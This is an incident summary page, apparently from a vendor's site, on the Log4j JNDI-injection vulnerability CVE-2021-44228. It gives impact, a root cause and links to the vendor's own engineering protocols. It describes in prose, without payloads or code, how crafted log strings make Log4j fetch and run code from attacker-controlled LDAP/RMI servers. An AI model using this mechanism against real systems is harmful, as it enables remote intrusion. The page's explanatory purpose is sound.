Apache Software Foundation (Log4j): CVE-2021-44228 — JNDI injection in Log4j enables remote code execution
A JNDI lookup feature in the widely-used Apache Log4j Java logging library allowed attackers to trigger arbitrary remote code execution by crafting log messages containing JNDI lookup strings.
2 of the 3 practices that failed in this incident are part of the Sentinel-10 — the engineering protocols Concordance flags as most degraded under AI-accelerated development.
This incident pre-dates today's AI-velocity surge. The thesis is that the same practices that failed here will fail faster under AI velocity if not actively governed. Read the Velocity Governance thesis →
Impact
Log4j was used in millions of Java applications including products from Apple, Amazon, Cloudflare, IBM, Microsoft, and most enterprise Java systems. CISA called it "the most serious vulnerability I have seen in my decades-long career."
Root cause (from published RCA)
Log4j 2.x supports lookups that perform JNDI substitution by default. When user-controlled data is logged, attackers can inject JNDI lookups that cause the logger to fetch and execute remote code from attacker-controlled LDAP/RMI servers. The dangerous behaviour was enabled by default with no documented warning.
Concordance protocols that map to this root cause
Click any protocol to see every other indexed incident where it failed.
Primary sources
Related incidents
Other incidents that failed at least one of the same protocols.